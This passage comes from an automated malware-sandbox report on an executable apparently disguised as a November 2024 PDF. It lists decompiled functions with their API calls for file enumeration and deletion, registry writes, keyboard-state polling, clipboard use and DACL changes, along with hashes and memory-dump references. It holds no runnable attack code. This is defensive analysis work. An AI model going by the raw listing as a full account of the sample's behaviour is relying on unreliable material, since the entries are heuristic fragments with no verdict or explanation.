                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                      • API String ID: 3953360268-2428617273
                                                                                                                      • Opcode ID: 6e4baafe0490bac23245cca8f01fd4c5fb2d47221ba8e162f20d92d515f0bfbb
                                                                                                                      • Instruction ID: c12a9c253c5cd44459cf25ca6a9a1ef6119a1d5c5f2eaf24b57a5583737b0221
                                                                                                                      • Opcode Fuzzy Hash: 6e4baafe0490bac23245cca8f01fd4c5fb2d47221ba8e162f20d92d515f0bfbb
                                                                                                                      • Instruction Fuzzy Hash: 7EA12EB1518305EBC704EB64C88ADEFB7ECBF94701F408919F986D6191EB78DA09C762
                                                                                                                      Function 007BF200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007BF221
                                                                                                                      • _wcscmp.LIBCMT ref: 007BF236
                                                                                                                      • _wcscmp.LIBCMT ref: 007BF24D
                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 007BF25F
                                                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 007BF279
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 007BF291
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 007BF29C
                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 007BF2B8
                                                                                                                      • _wcscmp.LIBCMT ref: 007BF2DF
                                                                                                                      • _wcscmp.LIBCMT ref: 007BF2F6
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 007BF308
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(0080A5A0), ref: 007BF326
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 007BF330
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 007BF33D
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 007BF34F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 1803514871-438819550
                                                                                                                      • Opcode ID: cb4a15613ecd241f3cacfa7a9742c34eaffa90ddebd797e4a4e82004408e8437
                                                                                                                      • Instruction ID: bedfa6d8b89dadff880406af8cc15feaeb7c35ead23c421fef8673ee93c79950
                                                                                                                      • Opcode Fuzzy Hash: cb4a15613ecd241f3cacfa7a9742c34eaffa90ddebd797e4a4e82004408e8437
                                                                                                                      • Instruction Fuzzy Hash: 5331F376501209AADF14DBB4DC89BDE73FCBF08760F148176E815E31A0EB38DA44CA64
                                                                                                                      Function 007D0AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D0BDE
                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,007DF910,00000000,?,00000000,?,?), ref: 007D0C4C
                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007D0C94
                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007D0D1D
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 007D103D
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 007D104A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$ConnectCreateRegistryValue
                                                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                      • API String ID: 536824911-966354055
                                                                                                                      • Opcode ID: e2dd1de62132fff332934be65f5bae2762b3dfefb05f464109d72a9ba8b19d4c
                                                                                                                      • Instruction ID: d16ec6e96ee5a3572154d7dfa45a486584526b044b73d531a8de750855417160
                                                                                                                      • Opcode Fuzzy Hash: e2dd1de62132fff332934be65f5bae2762b3dfefb05f464109d72a9ba8b19d4c
                                                                                                                      • Instruction Fuzzy Hash: 94024875200601DFCB14EF24C895A6AB7F5EF88714F04885EF98A9B362CB78ED45CB91
                                                                                                                      Function 007BF35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007BF37E
                                                                                                                      • _wcscmp.LIBCMT ref: 007BF393
                                                                                                                      • _wcscmp.LIBCMT ref: 007BF3AA
                                                                                                                        • Part of subcall function 007B45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007B45DC
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 007BF3D9
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 007BF3E4
                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 007BF400
                                                                                                                      • _wcscmp.LIBCMT ref: 007BF427
                                                                                                                      • _wcscmp.LIBCMT ref: 007BF43E
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 007BF450
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(0080A5A0), ref: 007BF46E
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 007BF478
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 007BF485
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 007BF497
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 1824444939-438819550
                                                                                                                      • Opcode ID: 608cdff08954e6f50a469e5f3cf924b781b58099439c3f16c69dcc61cbb457b5
                                                                                                                      • Instruction ID: ba5c64bed86c27e752d6899d54b29182415d9ea71df283b5791404d887244343
                                                                                                                      • Opcode Fuzzy Hash: 608cdff08954e6f50a469e5f3cf924b781b58099439c3f16c69dcc61cbb457b5
                                                                                                                      • Instruction Fuzzy Hash: 3031E5715012596FDF149BA4EC88BDE77ACAF09760F148276E854E31A0DB3CDA44CA64
                                                                                                                      Function 007A81F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007A874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007A8766
                                                                                                                        • Part of subcall function 007A874A: GetLastError.KERNEL32(?,007A822A,?,?,?), ref: 007A8770
                                                                                                                        • Part of subcall function 007A874A: GetProcessHeap.KERNEL32(00000008,?,?,007A822A,?,?,?), ref: 007A877F
                                                                                                                        • Part of subcall function 007A874A: HeapAlloc.KERNEL32(00000000,?,007A822A,?,?,?), ref: 007A8786
                                                                                                                        • Part of subcall function 007A874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007A879D
                                                                                                                        • Part of subcall function 007A87E7: GetProcessHeap.KERNEL32(00000008,007A8240,00000000,00000000,?,007A8240,?), ref: 007A87F3
                                                                                                                        • Part of subcall function 007A87E7: HeapAlloc.KERNEL32(00000000,?,007A8240,?), ref: 007A87FA
                                                                                                                        • Part of subcall function 007A87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007A8240,?), ref: 007A880B
                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007A825B
                                                                                                                      • _memset.LIBCMT ref: 007A8270
                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007A828F
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 007A82A0
                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 007A82DD
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007A82F9
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 007A8316
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007A8325
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 007A832C
                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007A834D
                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 007A8354
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007A8385
                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007A83AB
                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007A83BF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3996160137-0
                                                                                                                      • Opcode ID: 9f332db6a8668143979ca09f3ed3ef54ad8eea8f23b43d467c05a3b563016255
                                                                                                                      • Instruction ID: a24579a785ad46233dfae87b5732f899dcbd4aec624e616479bf82758ddf6b4c
                                                                                                                      • Opcode Fuzzy Hash: 9f332db6a8668143979ca09f3ed3ef54ad8eea8f23b43d467c05a3b563016255
                                                                                                                      • Instruction Fuzzy Hash: E2614D71900209EFDF00DF95DC48AEEBBB9FF45700F14826AF816A7291DB399A05CB61
                                                                                                                      Function 00766843 Relevance: 20.9, Strings: 16, Instructions: 883COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oav$UCP)$UTF)$UTF16)$rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
                                                                                                                      • API String ID: 0-3342537335
                                                                                                                      • Opcode ID: 9668e0c512b1f8ca69f7d1f934e84e47c2a311a84eb2a5821f08ac5a6ae2e105
                                                                                                                      • Instruction ID: 6b85dce20f8c0e13b3615d2f5b31015495863c510e450e32544b9a2b928d6861
                                                                                                                      • Opcode Fuzzy Hash: 9668e0c512b1f8ca69f7d1f934e84e47c2a311a84eb2a5821f08ac5a6ae2e105
                                                                                                                      • Instruction Fuzzy Hash: 46727175E00219DBDF14CF59C8807AEB7B5FF89710F54816AE94AEB280EB789D41CB90
                                                                                                                      Function 007D0665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007D10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D0038,?,?), ref: 007D10BC
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D0737
                                                                                                                        • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                                                                                                                        • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007D07D6
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007D086E
                                                                                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007D0AAD
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 007D0ABA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1240663315-0
                                                                                                                      • Opcode ID: d091c9cdb9621637b42af85db0c9be87fb2323760f64b1e22c11f7e18dd8486c
                                                                                                                      • Instruction ID: 7bc0f76b90e8fc8086d3b1e1311e765fcdeb7b4b8a253b2f38a04a395f0fcb18
                                                                                                                      • Opcode Fuzzy Hash: d091c9cdb9621637b42af85db0c9be87fb2323760f64b1e22c11f7e18dd8486c
                                                                                                                      • Instruction Fuzzy Hash: 1CE11B75604210EFCB14DF24C895E6ABBF8EF89714F04C56EF84ADB262DA34E905CB91
                                                                                                                      Function 007B0219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?), ref: 007B0241
                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 007B02C2
                                                                                                                      • GetKeyState.USER32(000000A0), ref: 007B02DD
                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 007B02F7
                                                                                                                      • GetKeyState.USER32(000000A1), ref: 007B030C
                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 007B0324
                                                                                                                      • GetKeyState.USER32(00000011), ref: 007B0336
                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 007B034E
                                                                                                                      • GetKeyState.USER32(00000012), ref: 007B0360
                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 007B0378
                                                                                                                      • GetKeyState.USER32(0000005B), ref: 007B038A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 541375521-0
                                                                                                                      • Opcode ID: ab267d40ef5fea27c3ea38cdb65fc34caa4210e91166f0a5d323939c7c417240
                                                                                                                      • Instruction ID: ad2b822a5be2c5844b4404e420c5d91e7792a6295627bd9edafb78a32b279b1c
                                                                                                                      • Opcode Fuzzy Hash: ab267d40ef5fea27c3ea38cdb65fc34caa4210e91166f0a5d323939c7c417240
                                                                                                                      • Instruction Fuzzy Hash: A54189245047C96EFF319A64980C3EBBEE07F12344F08819ED5C6471C2EB9C99D887E2
                                                                                                                      Function 00764140 Relevance: 15.1, APIs: 1, Strings: 7, Instructions: 1132COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ERCP$Oav$VUUU$VUUU$VUUU$VUUU$rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
                                                                                                                      • API String ID: 0-1081084498
                                                                                                                      • Opcode ID: 5551812bcb78d9286c6ecc8ed4f17cc45c837f8a68f6f40cfc462463aae5d3e4
                                                                                                                      • Instruction ID: 751189f1d55a18b52620cdb9cfa777c93c94004bf4cae83b58298671f19d2e69
                                                                                                                      • Opcode Fuzzy Hash: 5551812bcb78d9286c6ecc8ed4f17cc45c837f8a68f6f40cfc462463aae5d3e4
                                                                                                                      • Instruction Fuzzy Hash: 2CA27E70E0421ACBDF28CF58D9907AEB7B1FF55314F2481AADC56A7280E7389E85CB51
                                                                                                                      Function 007C4458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1737998785-0
                                                                                                                      • Opcode ID: 8670d9f05b5076017d1a4c584bcc2d93491529cc37e1e36bfa14418de6188106
                                                                                                                      • Instruction ID: e4b13d0acad2b43d6472882270cdd3f796446cc3fa7c4ea39129f13053ce8c42
                                                                                                                      • Opcode Fuzzy Hash: 8670d9f05b5076017d1a4c584bcc2d93491529cc37e1e36bfa14418de6188106
                                                                                                                      • Instruction Fuzzy Hash: 01215A35201210DFDB10AF64EC19FA97BA8EF54711F14C02AF946DB2A1DB79E911CB98
                                                                                                                      Function 007B3A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007548AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007548A1,?,?,007537C0,?), ref: 007548CE
                                                                                                                        • Part of subcall function 007B4CD3: GetFileAttributesW.KERNEL32(?,007B3947), ref: 007B4CD4
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 007B3ADF
                                                                                                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 007B3B87
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 007B3B9A
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 007B3BB7
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 007B3BD9
                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 007B3BF5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 4002782344-1173974218
                                                                                                                      • Opcode ID: a7533f5ea6ebdf521b8f99cca63e72745c89a3927051008ddd3b609274796f1e
                                                                                                                      • Instruction ID: d59df1d303ff8287c89f1cc7ae3c2417376dc5d6eb4abb93728a34dbddfb85d6
                                                                                                                      • Opcode Fuzzy Hash: a7533f5ea6ebdf521b8f99cca63e72745c89a3927051008ddd3b609274796f1e
                                                                                                                      • Instruction Fuzzy Hash: BE51843180114CDACF15EBA0DD96AEEB779AF14301F6481A9E84277095EF786F4DCB60
                                                                                                                      Function 007BF65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 007BF6AB
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 007BF6DB
                                                                                                                      • _wcscmp.LIBCMT ref: 007BF6EF
                                                                                                                      • _wcscmp.LIBCMT ref: 007BF70A
                                                                                                                      • FindNextFileW.KERNEL32(?,?), ref: 007BF7A8
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 007BF7BE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 713712311-438819550
                                                                                                                      • Opcode ID: 2b17f7643f318044a33eb1cbf40aba8e83fabf7d843c068d3dd0e9ad41440df4
                                                                                                                      • Instruction ID: 6a1eeff9e22e7230752f429604ede2883f35007aa7f224377cc4a0972c51421d
                                                                                                                      • Opcode Fuzzy Hash: 2b17f7643f318044a33eb1cbf40aba8e83fabf7d843c068d3dd0e9ad41440df4
                                                                                                                      • Instruction Fuzzy Hash: E141707190020AEFCF15DF64CC89BEEBBB4FF05710F5485A6E815A2291DB389E44CB90
                                                                                                                      Function 007658C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
